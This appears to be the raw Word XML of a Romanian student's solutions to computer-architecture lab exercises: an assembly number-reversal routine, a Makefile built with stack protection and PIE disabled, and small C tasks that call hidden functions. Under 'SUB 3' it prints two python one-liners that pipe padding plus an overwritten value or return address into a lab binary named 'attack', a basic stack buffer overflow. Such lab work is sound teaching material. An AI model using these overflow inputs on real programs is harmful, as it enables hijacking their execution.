    <w:p w14:paraId="30F7303F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;TODO d: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Implementati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`int reverse(int a)` care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intoarce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rasturnatul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1602B123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unui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numar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intreg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fara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semn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.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Rasturnatul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este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numarul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obtinut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din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citirea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="005253CD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numarului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initial de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dreapta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la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stanga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716588E8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e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F421747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      - reverse(123456) = 654321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0583F5B5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      - reverse(300000) = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275DE59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      - reverse(10002)  = 20001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFBBA5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reverse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E9571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4E27C420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669BE2AE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5540C00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045D06DD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7FDCFBDC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5BB7343C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</w:p>
    <w:p w14:paraId="1E5BD1D1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438D079B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</w:p>
    <w:p w14:paraId="1469A67E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loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3424F9CE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09901900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end_loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="781BBB36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AE9F8E2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5CFDD017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1024E1F8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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD91E0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div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27D233B7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616B857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build_nr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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70AAB8AB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imul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nr * 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B7ADF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3F4E73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nr * 10 + rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C259580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48E53D32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loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D697E02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end_loop_reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F4E73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7313DA35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BA70808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31EC0096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45DF40A0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20BF1491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F4E73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5D84BB5E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814E3EF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6479190B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F4E73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F4E73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14C2B74E" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="003F4E73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CFEEBED" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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2AADAC9B" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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63C3710D" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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5BD4E925" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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12012016" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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5038B832" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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2AFF2597" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SUB 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951DA04" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461B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9060D0" wp14:editId="13DEDEE3">
            <wp:extent cx="5943600" cy="2522855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2005509146" name="Imagine 1" descr="O imagine care conține text, scrisoare, captură de ecran, Fon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09146" name="Imagine 1" descr="O imagine care conține text, scrisoare, captură de ecran, Font&#10;&#10;Descriere generată automat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7BDB" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="5D0D676F" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B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1B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>" *64 + b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B9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461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B9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461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90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461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645F64C" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="2506ADCF" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B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1B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>" *72 + b"\x0c\x93\x04\x08")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C469CC5" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="0BF8D862" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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461B90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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00461B90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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491DE86" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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B1299FD" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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461B90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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA5A8D" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90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    /* call hidden function from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00461B90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object.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90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with the "key1 key2" argument */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59608C51" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90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461B90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order_please</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00461B90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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00461B90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johns</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00461B90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 xml:space="preserve"> pizzeria"</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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461B90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0xF00DBABE</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3E8FF" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90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461B90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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00461B90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gramStart"/>
      <w:r w:rsidRPr="00461B90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  <w:r w:rsidRPr="00461B90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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="133E7C38" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90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461B90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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30344D" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90" w:rsidRDefault="00B46619" w:rsidP="00B466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7536482" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00461B90" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA1D1A2" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00E73B75" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321071B9" w14:textId="77777777" w:rsidR="000A6B82" w:rsidRDefault="000A6B82"/>
    <w:p w14:paraId="5F5C42F2" w14:textId="77777777" w:rsidR="003A4125" w:rsidRDefault="003A4125">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDFAD62" w14:textId="71812FA7" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">VAR 2023 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F3EB34" w14:textId="58493C26" w:rsidR="0058117D" w:rsidRDefault="0058117D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3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71F705" w14:textId="3967121C" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="422E841A" wp14:editId="10EAF82F">
            <wp:extent cx="5943600" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="282543371" name="Imagine 1" descr="O imagine care conține text, document, hârtie, Fon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43371" name="Imagine 1" descr="O imagine care conține text, document, hârtie, Font&#10;&#10;Descriere generată automat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4A4D" w14:textId="0FA2112F" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E133A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CFLAGS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8117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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-Wall -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Wextra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Iinclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-stack-protector -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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mpreferred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-stack-boundary=2 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-PIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14433B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LDFLAGS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8117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=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-m32 -no-pie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363F9E2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D764FEE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# TODO: Compile main with task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE54EFB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all</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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secret.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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task2.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E13ADC7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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-o main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE86C8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685782E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58117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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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main.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0960482B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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBD49B9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1C22F92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# TODO: Add rule for task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A7ED6C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task2.o</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: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task2.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C2BF6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$(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CC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 $(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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CFLAGS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) </w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$^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-c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F7381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clean</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B6B1B1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EEE5C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rm -rf task2.o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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main.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B18BC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EFA479A" w14:textId="77777777" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B580A83" w14:textId="0B1D181E" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124DC580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color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include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8117D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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0058117D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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058117D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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E8016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7A4BBDB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// TODO: Freestyle starts here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7C808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int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8117D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task2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(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117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int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8117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a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58117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int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8117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>b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58117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int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8117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*</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sum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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C519DF7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4225FC60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8117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*</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sum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8117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=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8117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a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8117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+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gramStart"/>
      <w:r w:rsidRPr="0058117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>b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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="464FBB14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58117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if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(</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117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*</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sum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8117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&gt;=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8117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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8BDB0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r w:rsidRPr="0058117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*</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117D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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sum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8117D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=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gramStart"/>
      <w:r w:rsidRPr="0058117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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F21F775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r w:rsidRPr="0058117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return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gramStart"/>
      <w:r w:rsidRPr="0058117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-</w:t>
      </w:r>
      <w:r w:rsidRPr="0058117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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="351F1A59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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05428FD1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8117D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return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gramStart"/>
      <w:r w:rsidRPr="0058117D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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65940357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8117D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A510634" w14:textId="77777777" w:rsidR="0058117D" w:rsidRPr="0058117D" w:rsidRDefault="0058117D" w:rsidP="0058117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B5BCAC8" w14:textId="77777777" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638673F6" w14:textId="13F04FF8" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29197174" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include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E1AD2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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1AD2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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1AD2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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022363F" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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B87F730" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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void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E1AD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task3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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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void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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A22C048" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62376DCF" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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// TODO: Call secret function with correct arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C8E5F" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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secret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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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5E1AD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0xDEADC0DE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C6E82C4" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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}</w:t>
      </w:r>
    </w:p>
